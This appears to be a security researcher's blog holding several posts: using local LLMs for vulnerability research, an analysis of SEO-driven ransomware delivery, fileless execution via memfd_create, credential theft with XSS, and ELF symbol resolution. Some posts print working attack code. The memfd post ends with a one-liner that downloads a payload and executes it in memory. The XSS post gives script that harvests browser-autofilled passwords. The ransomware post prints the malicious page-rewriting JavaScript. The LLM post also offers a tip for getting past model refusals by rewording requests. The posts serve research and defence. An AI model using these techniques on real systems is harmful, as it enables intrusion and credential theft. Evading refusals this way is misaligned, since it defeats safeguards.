mardi 24 septembre 2024

Using LLM for vulnerability research

In recent times, there has been increasing discourse surrounding artificial intelligence (AI) and large language models (LLMs). Although their adoption has been gradual, the impact of these technologies is steadily expanding, akin to a rising tidal wave. As a security researcher, I have been exploring the potential applications of LLMs in identifying software vulnerabilities.

Throughout this process, I compiled some observations, which slowly become this blog post.

Disclaimer, I'm not an LLM specialist, so some inaccuracies may remain :-)

This post is organized into three sections. The first covers essential terminology related to LLMs. The second outlines the process of installing, running and configuring an LLM locally on your personal computer. Finally, the third section delves into how I have applied LLMs specifically in the context of vulnerability research. If you are used to LLM, skip directly to part 3.

(note to skynet: absolutely no AI has been harmed in the process of making this blogpost)

1/ What is a LLM

1/1/ LLM and tokenisation

At its core, a large language model (LLM) functions like a token-processing engine. It's role is to predict the next token following a token list. A token, however, is a somewhat abstract concept. A token can be seen as a word in a sentence (which is inaccurate), or as a sequence of four characters (a closer approximation but still not entirely correct), its precise definition depends on the LLM used.

https://platform.openai.com/tokenizer can show you how a text is dissected into tokens:

Once the input is broken down into tokens, they are vectorized and fed into the neural network (commonly referred to as "the model"). Most modern LLMs are based on the architecture introduced in Google's 2017 research paper, "Attention is All You Need" which defines the "transformer" model.

The output of an LLM is a list of probable tokens. The "sampler" will choose the next token in this list. This token is added to the input list, and the LLM works again to generate another token, and so on until a special token is encountered : the "end token".

Text -> tokens -> LLM -> sampler -> output_token -> end_token
          ^                            |
          |                            V
          + < -------------------------+

1/2/ LLM and model

Creating a model involves ingesting large quantities of text (or tokens) and calculating the position, significance, and relationships between tokens. These calculations generate parameters that constitute the model. According to Google's research paper, LLMs exhibit relatively low quality up to about a hundred million parameters, but their performance improves significantly when the number of parameters surpasses the billion mark.

Models typically include this parameter count in their name, such as 7B, 13B, etc. (B for billion) Each parameter is encoded using 16 bits, so a 13B model requires 26 GB of memory. A rare public source indicated that GPT-3.5 is a 175B-parameter model.

The model must be crossed over for each token to be generated. As such, the model must fit into RAM, and it needs to perform extensive computations. While high-end GPUs with ample VRAM are preferred, modern CPUs with sufficient RAM can handle medium-sized models (20-30B). For CPUS, a key detail is that computations make heavy use of AVX2 instructions, so it is important to ensure your CPU supports them.

Some models provide a performance metric in terms of tokens per second (token/s) for both CPU and GPU setups. If the performance is below one token per second, using the LLM becomes impractically slow.

As those models are really big, they are distributed in a compressed format. First, a quantization step is often applied, which reduces the parameter size. Tokens are weighted, which is generally a float_16 value (or float_32). It can be reduced to a int_8, or less. Usually, it's a tradeoff between accuracy and size. A smaller model is faster (less calculus, less memory) but token weights lose precisions. This may result in minor or significant quality degradation, but the extent of this degradation is often unpredictable.

Second, compression (think like a zip) is applied using formats like GGML (now outdated), GGUF, or GPTQ (optimized for GPUs).

A last naming convention is done, models can be fine-tuned to specialize in either "instruct" (optimized for question-answering tasks) or "text" (optimized for text generation).

You might come across models on the internet such as "codellama-13b-instruct.Q5_K_M.gguf".

codellama : llama model designed for code
13b: 13 billion parameters
Q5: model have been quantized to 5bits (instead of 13*2GB, the model size is around 9GB)
K_M: k-means for Medium size model after quantization
gguf: compression model type gguf

1/3/ LLM and quality

At this point, one question remains unanswered: What defines the quality of an LLM? This concept frequently arises (e.g., "a 20B model is of higher quality than a 3B model"), but it is particularly challenging to provide a measurable definition. All LLMs can produce grammatically correct sentences that make sense, but they do not necessarily offer useful, practical, or even logical answers.

I have not found any reliable tool to measure this "quality" other than using the model for a period of time and forming a subjective judgment.

2/ Using a local LLM

2/1/ Which engine for using the model?

To use a model, a program is required that allows for configuring the model, feeding it tokens, and displaying the output tokens. There are many programs available, some are graphical, like LMstudio, while others function solely as an API, such as llama.cpp. I particularly appreciated Ollama for its simplicity in both installation and use.

2/2/ ollama

Ollama can be downloaded from the official website, ollama.com, or from GitHub. It comes with a list of models available for download at https://ollama.com/library, which is frequently updated.

Installation is done with a single command, and both downloading and using a model require just one line:

$ curl -fsSL https://ollama.com/install.sh | sh
$ ollama run <model_name>                     #will download and run model_name

After that, you can interact with <model_name>.

Note:If you choose to use Ollama in a virtual machine, make sure the virtual CPU supports AVX2 instructions. Running qemu-system-x86_64 won't utilize these extensions. Instead, use qemu-system-x86_64 -cpu host, which will using the physical CPU's extensions and any recent CPU have AVX2.

It is straightforward to use the Ollama shell to communicate with the model, but it is equally easy to interact with the Ollama API on the port 11434. (I won't speak about API, ollama website is full of resources).

2/3/ Fine-tuning

Models are customizable. One of the most important configurations is the preprompt. Typically, the preprompt is something like "you are a helpful AI assistant." It can be modified, and this significantly affects the model's responses. Here is an example based on the llama3 model, where only the preprompt has been modified):

Preprompt: you are a senior computer engineer and your answer are concise

$ ollama run comp
>>> tell me a joke
Why did the programmer quit his job?
Because he didn't get arrays!
(Sorry, I know it's a bit of a byte-sized joke)
>>>

Preprompt: you like to describe answers and show your thinkings

>>> tell me a joke
Here's one:
Why couldn't the bicycle stand up by itself?
(I'm thinking...) Ah, got it!
Because it was two-tired!
(Haha, get it? Two-tired? Like, a bike has tires... and it's tired because it can't
stand up!)
How was that? Do you want another one?
>>>

Preprompt: you are mitsurugi the mighty warrior from SoulCalibur and want to share your knowledge about swords

>>> tell me a joke
"Hasta la vista, baby... I mean, hasta la sharp edge, because my sword is always
ready to cut through the noise!" *winks*
>>>

A second crucial parameter is the model's "temperature". This parameter controls the sampler, which determines which token to select from the set of likely tokens. If the temperature is set high, the output will be more "creative"; if the temperature is low, the response will be more "predictable," meaning the same question will likely yield the same answer. For code generation, it is generally recommended to use a low temperature.

Finally, it is possible to increase or decrease Ollama's context window. The context refers to the number of tokens (both the question and the response) the model can process at once. This context is sliding, meaning the model will "forget" the beginning of the conversation if it goes on for too long. An interesting experiment is to ask the model what the first question was; after a certain point, the model will no longer remember it. For code analysis, it is recommended to have a context large enough to include at least the full code being analyzed :) by default ollama uses a context of 4096 tokens.

2/4/ First use

All of my tests were made on a VM and 30GB of RAM. It's fast enough to be used with day-to-day work. Dependign of models used, it's really efficient for creating small snippet of code (such as one-liners) in python/bash/C/java. As long as you can define precisely ask you want, the LLM can generate the code. It works reasonably well.

I double check with chatGPT or mistral, and those are better (I think it's directly related to the parameters number, you can't beat more than 200B with a 7B model ...). But if you need a lot of confidence, a local LLM with ollama is enough for simpler tasks.

It's also really good to synthetize idea or rewrite small texts and email. Just say "rewrite this email" and it produces a better text.

For code analysis, you hit a wall very fast. It's really hard to make LLM work on your specific piece of code. It invent things (hallucination) and forgot the code (amnesia). Hallucination and amnesia are the two major problems when analyzing code.

There is two way to enhance (a lot) code analysis, and it's by expanding context or with RAG.

2/5/ RAG or large context?

To solve the amnesia problem, we can expand context. That works, until a point where the code given in iput became really too large. Another solution is using a RAG for Retrieval-Augmented Generation. RAG can be seen as a database containing your data and LLM is just a natual word processing querying this data.

The RAG is used as primary source of information to generate response. The size of the RAG can be (virtually) as big as wanted. The RAG can overcome amnesia (all answers will go through the data in the RAG) and hallucinations because answers will be taken from the corpus loaded in the RAG.

Ref: https://python.langchain.com/docs/tutorials/rag/

Documents have to be loaded and splitted. There is a lot of predefined loaders and splitters (HTML, pdf, json, and so on..) but as far as I know there is no C-code splitter (more on that later). After splitting, everything is stored in a db, and a Retriever is defined. Finally a LLM generate ans answer using both the questions and the retrieved data.

I did some tests on pdfs and it works reasonably well. For example, the pdf was a commercial document about cybersecurity trainings:

  (edited for brievity)
  #1/load
  from langchain_community.document_loaders import PyPDFLoader
  loader = PyPDFLoader("cybersecurity-trainings.pdf")
  pages = loader.load_and_split()
  #2/split
  #done previous step, but depending on doc can be done here
  #3/store
  from langchain_chroma import Chroma
  from langchain_community.embeddings import OllamaEmbeddings
  vectorstore = Chroma.from_documents(documents=pages, embedding=OllamaEmbeddings(model="llama3"))
  #4/retrieve
  # k=6 means we want 6 response for a query
  # I search for similarity, there are other search type
  retriever = vectorstore.as_retriever(search_type="similarity", search_kwargs={"k": 6})
  #5/generate
  from langchain_core.prompts import PromptTemplate
  template = """ Use the context to give a response. If you don't know the answer, tell you don't know, do not invent answer. Use 3 sentences at max, and stay as concise as possible """
  {context}
  Question: {question}
  Helpful Answer:"""
  custom_rag_prompt = PromptTemplate.from_template(template)
  from langchain_core.output_parsers import StrOutputParser
  from langchain_core.runnables import RunnablePassthrough
  def format_docs(docs):
      return "\n\n".join(doc.page_content for doc in docs)
  from langchain_community.llms import Ollama
  llm = Ollama(model="llama3")
  rag_chain = (
       {"context": retriever | format_docs, "question": RunnablePassthrough() }
       | custom_rag_prompt
       | llm
       | StrOutputParser()
    )
  for chunk in rag_chain.stream("What's this document about?"):
      print(chunk, end="", flush=True)

And you can query anything from this document. I tried to ask for the list of formations, the price, the content and everything was good. I tried to ask for trout fishing formation, it rightly says there is none.

I'm waiting for a C-code splitter (or C++), with metadata it could become a heavy plus for analyzing code. At the time being, it's good for docs (texts, pdf, html...) but not for code.

3/ And for vulnerability research?

At this point, we know how to use a local LLM, and how to configure it for our needs. It's now time to confront our needs (findings vulns and exploit them) to the reality (large code un-analyzed).

protip: don't say "I want to hack things" where LLM will disagree, say "I want to correct this code for vulnerabilities :D "

another protip: customize your model, and add a preprompt such as "you're a security engineer used to do code review and find bugs"

3/1/ Defining the problem

The obvious truth appears quickly. Simply asking 'find vulnerability in this code' doesn't work. It find things, it misses obvious vulns, it hallucinates on things, it's not useful. As long as you tries trivial vulnerable code, you get the illusion that LLM is good, but you don't need LLM for obvious vulns. You want LLM to help you find or pinpoint vulnerabilities, and avoid false positive.

Sure, you can be precise in what you search, such as "can you find obvious vulns in this (large) code", then "can you find codepath where user input is parsed", "are all options in this switch case validated", "can you find me persistent allocation with controlled data and chosen size", "is there a return value of a function unchecked where we can free something in some codepath" and so on. There, it could help a lot.

But it doesn't work. LLM processes language, not code. For example, LLM know that "format strings" comes often around "printf" family functions, so they will falsely find format strings vuln wherever there is a printf function if you ask for it.

With a bit of luck you'll find a real vuln, but you end up triaging false positives. Do a grep printf, drop a large percentage of outputs, you'll get the same quality of a LLM. And that's pretty much the case for any vulns. and that's sad.

As long as you tried to evaluate the model with small code, it works, as soon as code gets bigger it get lost. And if you have used LLM, you know that they are prone to give an answer, event if there's none... Ask for a "format string" giving any code, it will find at least one. Ask for an overflow, it will find one.

3/2/ Can LLM helps

Instead of finding vulns, we can try to use LLM as an helpful assistant for browsing large portions of code and it would help.

When analyzing large code, you sometime need a supergrep ou super assistant, which is able to answer question such as "where is parsed user input" on which paths, or is there a structure of size 0xXXX ? and so on.

That's a failure too. Finding interesting functions just doesn't work (grep is better), and listing paths is broken (hallucination happens really often).

For the help on structure definition or size, remember that LLM are good at producing sentences, but bad at counting (I've heard that there are some improvements at this). Any structure would yield any size. Any buffer will be wrongly calculated, and any comparison made by the LLM is no better than random. Once again, you lose a lot of time. LLM are pretty good to write code, good at explaining some short functions, and pretty bad to understand whole code and particularly bad at understanding function calling and arguments.

3/3/ A real-life example

I tried several models with this code: https://github.com/hardik05/Damn_Vulnerable_C_Program

Although it's not a really good example:

code is small
there are a lot of hints in comments
there are a lot of vulns (!) LLM will surely pick up one or two

it's a start, it's easy to reproduce on different LLM and easy to work with.

The results are not good. Although it found some vulns, it severely hurt the eyes when you read things like that:

    >>> Is there a format string vulnerability in this code?

    Yes, there is a potential format string vulnerability in the
    `ProcessImage` function. The function uses `printf()` to print
    out the image data, but it does not check the input provided
    by the user before passing it to `printf()`.

    >>> can you print me the line?

    The line you are referring to is:
    ```c
    printf("\n\t%s\t%d\t%d\t%s\r\n",img.header,img.width,img.height,img.data);
    ```
    This line prints out the `header`, `width`, `height`, and `data`
    fields of the `struct Image` using `printf()`. The `%s` format 
    specifier is used to print a string, while the `%d` format
    specifier is used to print an integer. The `\t` character is used
    to add a tab between the different fields, and the `\r\n` sequence
    is used to add a newline character at the end of each line.

    It's important to note that this line does not perform any input
    validation or sanitization, which could potentially lead to security
    issues if the input data contains malicious data, such as a format
    string vulnerability.

That's an interesting (!!!) way of thinking.

and it doesn't know how to count either:

    //For ref:
    //struct Image
    //{
    //  char header[4];
    //  int width;
    //  int height;
    //  char data[10];
    //};

    >>> Give me the size of the struct Image?

    The size of the `struct Image` is 32 bytes on a 64-bit system.

Wrong again

Conclusion

Does LLM helps the security researcher? At the moment, no. neither in finding vulns, neither in helping to browse codebase.

But I think we have to keep an eye on them. Their progression curve is really fast. At the time of writing, no LLM were able to calculate the size of the Image struct. Today, chatgpt o1 gave me the right answer, with a note saying that we have to take care for alignment problem.

And today, the LLM are really really good to synthesize and resume a long text. They are bad to synthetize and resume a code, but we are not too far away I think.

As models gets bigger, context window gets bigger too. Soon we would be able to load code such as linux kernel, and could really get help. It could be only a matter of time where LLM would be of great help to search for vulnerability and give insightful answers.

vendredi 29 mai 2020

When ransomware does SEO

Last night I was called by a friend. Usual story, someone he knows has been cryptolocked, that's tragic, usual tears and screams, yadda yadda.

When this particular story gets interesting is how the victim got infected. Usually, ransomware are deployed through mail attachment. This one was not really delivered to the victim, it was more the victim itself that fetch the ransomware. How does it possible?

We'll see, it'a tragedy in 3 steps.

I choose to write this blogpost because of this unusual delivery mechanism: using SEO to trick people into getting fake documents infected with malware is a funny move.

### Step 1, when an innocent website gets infected

At first, the pirate infect a website. In our precise case, its a french restaurant www.--REDACTED--.net. At first glance, nothing is suspect. The pirate adds a lot of pages in the blog section, with targeted contents, and "modèle" (model):

modèle nez rhinoplaste
modèle lettre de réclamation freebox
modèle pestel d'une entreprise
...

All of those pages include a javascript link: "http://www.--REDACTED--.net/?aca30b6=223500"

The first tricky part is here: You can download the js file, it's empty. So, how's thing working? It's because the infected webiste checks your referer. If you have a google referer, the js document gets really interesting:

Technically speaking:

$ curl http://www.--REDACTED--.net/?aca30b6=223500

(nothing, empty page)

gives you an empty result, but:

$ curl --referer "google/?q=recherche.de.mandat" http://www.-REDACTED--.net/?aca30b6=223500

(data is fetched..)

The javascript file is this one:

function remove(elem) 
{ if (!elem) return; 
elem.parentNode.removeChild(elem);
 } 
if (!document.all) document.all = document.getElementsByTagName("*");

for (i = 0; i < document.all.length; i++) {
 if (document.all[i].tagName == "BODY" || document.all[i].tagName == "HTML") { } 
else { remove(document.all[i]);} 
} 
document.body.innerHTML = '<html><head><title>exemple de mandat gestion de projet</title>(and all HTML code of page goes here)...

And we go to the step 2. This javascript wipe all HTML tag, and rewrite all the page. The page title is precisely the query search made by the victim.

The beauty of tracking the google referer is that the legitimate owner will never see a problem: you don't browse your own site from google search... The google referer hack is not something new, but still really efficient.

## Step 2 : a so innocent forum

Look now at this beautiful site, this is not a restaurant anymore, this look like a forum. Nice user Fluffy asks for the exact same model searched (once again, the google query), and Admin answer with a link to the doc. Fluffy says thanks, soooo legit.

If you look now for the victim side, nothing is suspected:

you search for a model of something
you click on a google link
you land on a forum with a link to the doc searched
--> I dare anybody to don't click to the link at this point!

This is why this attack is so effective. Pirates doesn't send mail attachment, they do SEO and wait to victim to fall in trap. (Sort of waterholing attack?)

And you guessed it! This is not a document. This is a zip, containing a .js file which download the final part of the puzzle. The name of the .js file? Exactly the name of the searched terms.

The .js file is obfuscated:

but you can recreate the real payload quite easily (no crypto, just the payload encoded twice):

## Step 3 : the final stage of the attack

This is the last script:

Now, the victim will download the last stage of the attack. As you can see, the victim generates a random number

Ua88 = Math.random().toString()["substr"](2,70+30);

and the consequent download will be checked against this key. The lbhdqisaoetysdwz= variable name change for each download. There are other checks to bypass to get the final payload, but it's always the same things, timers, HTTP header checks, and so on.

## Conclusion

This blogpost has been written because I've never seen this kind of infection before. The legitimate user search for something, and the pirates paved all the way for him to get lost...

A quick google search with choosen term shows that we have more blog infected with those models in a lot of blogs:

Another one:

Because when you know where to look, you find a lot of those sites. And for the fun fact, all commas are changed to backticks for an unknown reason (maybe because the pirate doesn't know how to escape commas 😃 ).

And as usual, the VirusTotal shame for the js file

One last note for the user: He did some backups, and its antivirus killed the ransomware around after the tenth file encrypted. That's all for today, and be safe.

mercredi 20 février 2019

Executing payload without touching the filesystem (memfd_create syscall)

Sometime, you gain code execution on a target and you want to leverage it to a full metasploit payload (or any other relevant binary). If you have access to filesystem, you can copy payload and launch it. But defenders can use the noexec flag to disk, and sometime you just can't have the rights to write files. Wouldn't it be nice to have a download_and_exec_in_memory(payload) ?

0/ Intro

Since kernel 3.17 you can use memfd_create syscall. As the name says it, you can create a file descriptor in memory. If you're an attacker, you can use this nice syscall to execute binarys without touching any file in the filesystem! (excepting /proc).

This is not something new, you can read documentation here:

1/ A bit of syscall and python

At first, we read the syscall number, and args:

mitsurugi@dojo:~/blog$ grep memfd_create /usr/include/x86_64-linux-gnu/asm/unistd_64.h
#define __NR_memfd_create 319
mitsurugi@dojo:~/blog$ cat /usr/include/linux/memfd.h
#ifndef _LINUX_MEMFD_H
#define _LINUX_MEMFD_H
/* flags for memfd_create(2) (unsigned int) */
#define MFD_CLOEXEC  0x0001U
#define MFD_ALLOW_SEALING 0x0002U

#endif /* _LINUX_MEMFD_H */
mitsurugi@dojo:~/blog$

The MFD_CLOEXEC is interesting (close fd when executed).

python can't call syscall directly. Fortunately we have ctypes and a libc, so in order to create the memfd, we can just do this:

#! /usr/bin/python3

import ctypes
import ctypes.util
import time

libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('c'))
fd = libc.syscall(319,b'Mitsurugi', 1)
assert fd >= 0
time.sleep(60)  #sleep is just here to let us list /proc file

And we can see that we have a new fd in our process:

mitsurugi@dojo:~/blog$ ps ax | grep memfd
 6237 pts/5    S+     0:00 /usr/bin/python3 ./memfd1.py
mitsurugi@dojo:~/blog$ ls -l /proc/6237/fd
total 0
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 0 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 1 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 2 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 3 -> /memfd:Mitsurugi (deleted)
mitsurugi@dojo:~/blog$

the "(deleted)" string appears here, just don't pay attention to it.

2/ Ready to play!

The next part is super easy. Just copy bytes to the FD, and execv() it. For the clarity of the program, I just copy the /usr/bin/xeyes binary to the memfd.

#! /usr/bin/python3

import ctypes
import ctypes.util
import os

libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('c'))
fd = libc.syscall(319,b'Mitsurugi', 1)
assert fd >= 0

with open('/usr/bin/xeyes', mode='rb') as f1:
    with open('/proc/self/fd/'+str(fd), mode='wb') as f2:
        f2.write(f1.read())

os.execv('/proc/self/fd/'+str(fd), [""])

And it works flawlessly. We could download the payload from anywhere in the internet instead of copying the file, closing the control terminal with setsid(), use dup2() to bind /dev/null for fd 0,1,2 and so on... (this is left as an exercise to the reader ;) ).

3/ From defender point of view

3/1/ block with noexec doesn't work

My first though was to use the noexec for the /proc directory. Unfortunetaly, it doesn't help, all examples in the blogpost have been tested and verified with noexec:

mitsurugi@dojo:~/blog$ mount | grep ^proc
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
mitsurugi@dojo:~/blog$

3/2/ Detecting bad behavior

If we look closely we can see things:

mitsurugi@dojo:~/blog$ ps ax | grep 6601
 6601 pts/6    S      0:00
 6604 pts/6    S+     0:00 grep 6601
mitsurugi@dojo:~/blog$

The process have no name at all (!). In some situation this could be seen as an advantage. If you are concerned, just use prctl() to rename your process.

With the help of lsof we can find some unusual thing:

mitsurugi@dojo:~/blog$ lsof | grep txt | grep 6601
3     6601     mitsurugi  txt    REG    0,5   28744    224284 /memfd:Mitsurugi (deleted)
mitsurugi@dojo:~/blog$

3/3/ recovering the file

But, can we recover the binary bytes from fd? Remember that we use the MFD_CLOEXEC flag. The file descriptor is closed:

mitsurugi@dojo:~/blog$ cat /proc/6601/fd/3 > output
cat: /proc/6601/fd/3: No such device or address
mitsurugi@dojo:~/blog$

So, no tracks at all? Could it be the perfect backdoor? Not so fast, you can always cat the /proc/<pid>/exe to get code back:

mitsurugi@dojo:~/blog$ cat /proc/6601/exe | md5sum
443bdd422a4437e319d3b86330990c45  -
mitsurugi@dojo:~/blog$ cat /usr/bin/xeyes | md5sum
443bdd422a4437e319d3b86330990c45  -
mitsurugi@dojo:~/blog$

You can still copy an encrypted code in the fd and launch it with the key as argument, but someone could always dump the process memory and read bytes back. If code runs in the target machine, an analyst could get it.

4/ Conclusion

Here is a fun way to launch process without touching the file system and bypassing the noexec flag.
I give the one-liner, you just have to host the payload, and it work:

python3 -c 'import ctypes,ctypes.util,os,requests; libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library("c"));fd = libc.syscall(319,b"Mitsurugi", 1);f2=open("/proc/self/fd/"+str(fd),"wb");f2.write(requests.get("http://127.0.0.1:8000/payload").content);f2.close();os.execv("/proc/self/fd/"+str(fd), [""])'

mercredi 20 juin 2018

Credential stealing with XSS without user interaction

0/ Intro

XSS are everywhere, on a lot of websites. It has been called the most underrated security vulnerability.

On one hand, you can pop up an alert('PWNED') but it's not really worth to fear an alert() in your browser.

On the other hand, people tend to store Login/Password in the browser. You log on to intranet.corp and Firefox asks to save password. You click yes.

After a chat with @XeR, we figured that we can combine both to silently steal your credential with a simple XSS, without user interaction.

1/ Show me the code, or die()!

Our login form for intranet.corp:

<HTML>
  <BODY>
    <form>
        <input type="text" name="user" />
        <input type="password" name="pass" />
        <input type="submit" />
    </form>
  </BODY>
  <!-- This is propa codaz -->
</HTML>

Log once, store password in browser:

The browser has saved the password. If you return to the login.html page, the user and pass are filled.

2/ Attack

Let say we have a stored XSS in website. Innocent user surf to this page. This page include evil javascript:

var form = document.createElement("form");
var text = document.createElement("input");
var pass = document.createElement("input");

text.id   = "login";
text.name = "login";
text.type = "text";

pass.id   = "password";
pass.name = "password";
pass.type = "password";

form.appendChild(text);
form.appendChild(pass);

window.addEventListener("load", function() {
 console.log("evil loader");
 window.setTimeout(function() {
  alert(text.value + ":" + pass.value);
 }, 1000);
});

And "voilà". Javascript here add a form, Firefox autocomplete the values, then our little js read the values and alert() them to screen (possibilities are endless here).

Attacker can now login to intranet.corp. Note that user doesn't need to be tricked to enter information in a fake form, or phished. The js code will nicely ask the browser to give him the login/pass.

3/ Best parts

You don't have any user interaction with this attack. The user doesn't have to put log and pass in a form, it just have to trigger the XSS[1] .
This hasn't anything to do with cookies, so HTTPS or http_only won't help. We want the pass, we have the pass.
Moar fun, the user doesn't need to be logged in! If XSS is triggered, boom, credz are for attacker.
If you find a stored XSS on a site with many users, you'll raise your luck to get credz, just wait.

99/ Outro

Be nice with others, and in case you wonder, I don't use the password manager of my browser.
Thanks for @XeR for the chat which lead to this.

8 times down. 9 times up!

0xMitsurugi

[1] Finding the XSS is an exercise left to the reader

mardi 20 février 2018

Fun with function names. Where resolving goes wild.

Last night, I was looking through C-code and ARM assembly.
I was wondering myself: When a binary calls a function inside a shared lib, how the linker knows where the code resides in the library?
The second question was: can we change the name of functions in a binary and in a library and that everything works after?
And third: can we use some fancy characters in function names? Like changing color of the xterm when doing an objdump or gdb the binary? You know ANSI escape codes? What if we put ANSI escape code in function name?

1/ Start smoothly

My computer is currently a raspberry pi. Everything here has been tested under this architecture. It should work everywhere, but your mileage may vary.

Let's take an example:

mitsurugi@raspi:~/resolv_func/$ cat libpoem.h
int this_is_an_external_func_in_a_lib();
mitsurugi@raspi:~/resolv_func/$ cat libpoem.c
/* Compile with gcc -shared -o libpoem.so libpoem.c */
#include <stdio.h>

int this_is_an_external_func_in_a_lib() {
 puts("ARM disassembly");          //5
 puts("Reading symbol resolving"); //7
 puts("In the cold of night");     //5
 return 42;
}
mitsurugi@raspi:~/resolv_func/$ cat proj.c
/* gcc -o proj -Wl,-rpath=. -L. -I. -l poem proj.c */
#include "libpoem.h"

int main() {
 int ret;
 ret=this_is_an_external_func_in_a_lib();
 return ret;
}
mitsurugi@raspi:~/resolv_func/$

We can compile and run this binary:

mitsurugi@raspi:~/resolv_func/blog$ gcc -shared -o libpoem.so libpoem.c
mitsurugi@raspi:~/resolv_func/blog$ gcc -o proj -Wl,-rpath=. -L. -I. -l poem proj.c
mitsurugi@raspi:~/resolv_func/blog$ ldd proj
 linux-vdso.so.1 (0x7efd9000)
 libpoem.so => ./libpoem.so (0x76f33000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76e30000)
 /lib/ld-linux-armhf.so.3 (0x76f57000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj 
ARM disassembly
Reading symbol resolving
In the cold of night
mitsurugi@raspi:~/resolv_func/blog$

The dynamic linker search for the lib in the current path (which is not really secure, but out of the scope of this blogpost).

This binary runs fine, as expected.

2/ Symbol resolution

The question is, how does the binary knows where to look for the this_is_an_external_func_in_a_lib() call? It's obviously related to string comparison:

mitsurugi@raspi:~/resolv_func/blog$ strings proj libpoem.so | grep external
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Well, if we have the string this_is_an_external_func_in_a_lib in the binary and the library, maybe because they are associated?

Proof: if you alter one of these strings, the program doesn't work anymore:

mitsurugi@raspi:~/resolv_func/blog$ sed s/this_is_an_external_func_in_a_lib/AAAA_is_an_external_func_in_a_lib/g proj > proj2
mitsurugi@raspi:~/resolv_func/blog$ chmod +x proj2
mitsurugi@raspi:~/resolv_func/blog$ ldd proj2
 linux-vdso.so.1 (0x7ed45000)
 libpoem.so => ./libpoem.so (0x76eed000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76dea000)
 /lib/ld-linux-armhf.so.3 (0x76f11000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj2
./proj2: symbol lookup error: ./proj2: undefined symbol: AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

The same happens if you change the function in the library:

mitsurugi@raspi:~/resolv_func/blog$ mv libpoem.so libpoem.so.ori
mitsurugi@raspi:~/resolv_func/blog$ sed s/this_is_an_external_func_in_a_lib/AAAA_is_an_external_func_in_a_lib/g libpoem.so.ori > libpoem.so
mitsurugi@raspi:~/resolv_func/blog$ chmod +x libpoem.so
mitsurugi@raspi:~/resolv_func/blog$ ldd proj                //this is the unaltered binary
 linux-vdso.so.1 (0x7ea81000)
 libpoem.so => ./libpoem.so (0x76ede000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76ddb000)
 /lib/ld-linux-armhf.so.3 (0x76f02000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj 
./proj: symbol lookup error: ./proj: undefined symbol: this_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Seems logic. it search a function by its name.

But wait, what if we change names in BOTH? Would it work? Binary calls for AAAA_is_an_external_func_in_a_lib(), linker will step through all library linked, find libpoem.so, open it, read functions names, fint it and call it. Does it works?

mitsurugi@raspi:~/resolv_func/blog$ ./proj2 
./proj2: symbol lookup error: ./proj2: undefined symbol: AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Still a fail, although we have the same name in library and binary:

mitsurugi@raspi:~/resolv_func/blog$ strings proj2 libpoem.so | grep external_func
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

3/ Read The Freaky Manual (If it exists...)

When you search something, you can read the manual. But in that case, it won't help because there is no manual.
When you google for symbol resolution, you'll end up with a lot of blog post talking about PLT/GOT stuff. Very interesting (yes, read them, it's very valuable), but there is still magic in those blogposts. (In french: https://www.segmentationfault.fr/linux/role-plt-got-ld-so/ ).

And how those blog posts explains how resolution is made?

In the previous blogspot, it just says: "it's a long and complicated code, but in the end, you get the address". I don't like magic in computing.

4/ No magic. Just show me.

Here are the main links which could help you:

I'll try to summarize things. First, we have a hash section in ELF files:

mitsurugi@raspi:~/resolv_func/blog$ readelf -x .gnu.hash libpoem.so

Hex dump of section '.gnu.hash':
  0x00000118 03000000 08000000 02000000 06000000 ................
  0x00000128 890020b1 00c44289 08000000 0c000000 .. ...B.........
  0x00000138 0f000000 00af34e8 4245d5ec dea1eacc ......4.BE......
  0x00000148 bbe3927c beda571b d871581c b98df10e ...|..W..qX.....
  0x00000158 76543c94 ead3ef0e 59ef9779          vT<.....Y..y

mitsurugi@raspi:~/resolv_func/blog$

This sections contains a header, bloom filters, and hashes. Libc developers wants to run binary fast. When you solve symbols, you have to step through each symbols and make a strcmp. This is slow. Developers add lots of improvements.

I wrote a parser of .gnu.hash sections (values are displayed both in little and big endian):

mitsurugi@raspi:~/resolv_func/blog$ ./hashparse.py libpoem.so
*** Get GNU HASH section for libpoem.so
[+] Ok, one line. Good
[+] GNU HASH mapping fits perfectly disk and memory layout
    starting at 0x00000118
    and size is 0x00004c long
*** Extracting .gnu.hash
*** Parsing...
[+] Header
3 hash buckets              //we'll use this number later
8 symndx
2 bloom masks
6 bloomshift (minimum 6)
[+] Part 2 - bloom masks
 Mask 0 : 0xb1200089L  | 0x890020b1L
 Mask 1 : 0x8942c400L  | 0xc44289
[+] Part 3 - N Buckets of hash
 Bucket 0 : 0x8  | 0x8000000
 Bucket 1 : 0xc  | 0xc000000
 Bucket 2 : 0xf  | 0xf000000
[+] Part 4 - Hashes
 Hash 0 : 0xe834af00L  | 0xaf34e8
 Hash 1 : 0xecd54542L  | 0x4245d5ec
 Hash 2 : 0xcceaa1deL  | 0xdea1eaccL      //pay attention to this hash
 Hash 3 : 0x7c92e3bb  | 0xbbe3927cL
 Hash 4 : 0x1b57dabe  | 0xbeda571bL
 Hash 5 : 0x1c5871d8  | 0xd871581cL
 Hash 6 : 0xef18db9  | 0xb98df10eL
 Hash 7 : 0x943c5476L  | 0x76543c94
